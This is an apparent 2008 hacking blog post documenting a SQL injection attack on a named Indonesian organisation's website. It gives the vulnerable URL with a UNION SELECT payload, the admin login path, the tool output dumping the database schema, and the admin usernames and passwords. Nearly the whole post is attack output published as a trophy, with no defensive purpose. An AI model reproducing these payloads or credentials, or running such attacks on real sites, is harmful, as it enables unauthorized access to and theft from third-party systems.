[SQLi] http://www.mtp.or.id ~ viperfx07 blog (hack + crack + web + app)

Saturday, October 11, 2008

[SQLi] http://www.mtp.or.id

1:04 AM Posted by viperfx07 hacking No comments

Tool --> schemafuzz.py v5.0
Admin loc --> http://www.mtp.or.id/login/
Admin usr:pwd --> [0] admin:123456 [1] adminmtp:123457
Dump:

[+] URL:http://www.mtp.or.id/detail_berita.php?id=19+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 20:15:44
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
 Database: adminmtp_mtpdb
 User: adminmtp@localhost
 Version: 5.0.51a-community

[Database]: adminmtp_mtpdb
[Table: Columns]
[0]artikel: id_artikel,judul,isi,tanggal,gambar,username
[1]berita: id_berita,judul,isi,tanggal,gambar,username
[2]guest: id_tamu,nama,alamat,tl,ttl,telpon,email,komen,tanggal
[3]komentar: id_kmn,nama,alamat,email,website,id_berita,tanggal,komentar
[4]komentar_artikel: id_kmn,nama,alamat,email,website,id_artikel,tanggal,komentar
[5]marquee: id,isi
[6]newsletter: id_nl,judul,tanggal,file_path,keterangan,username
[7]users: username,password,level,nama,tl,ttl,telpon,email,profil,foto

[-] [20:20:29]
[-] Total URL Requests 57
[-] Done

[+] URL: http://www.mtp.or.id/detail_berita.php?id=19+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 20:49:33
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
 Database: adminmtp_mtpdb
 User: adminmtp@localhost
 Version: 5.0.51a-community
[+] Dumping data from database "adminmtp_mtpdb" Table "users"
[+] and Column(s) ['username', 'password']
[+] Number of Rows: 2

[0] admin:123456:
[1] adminmtp:123457:

[-] 20:49:57
[-] Total URL Requests 4
[-] Done

viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Saturday, October 11, 2008

[SQLi] http://www.mtp.or.id

0 comments:

Post a Comment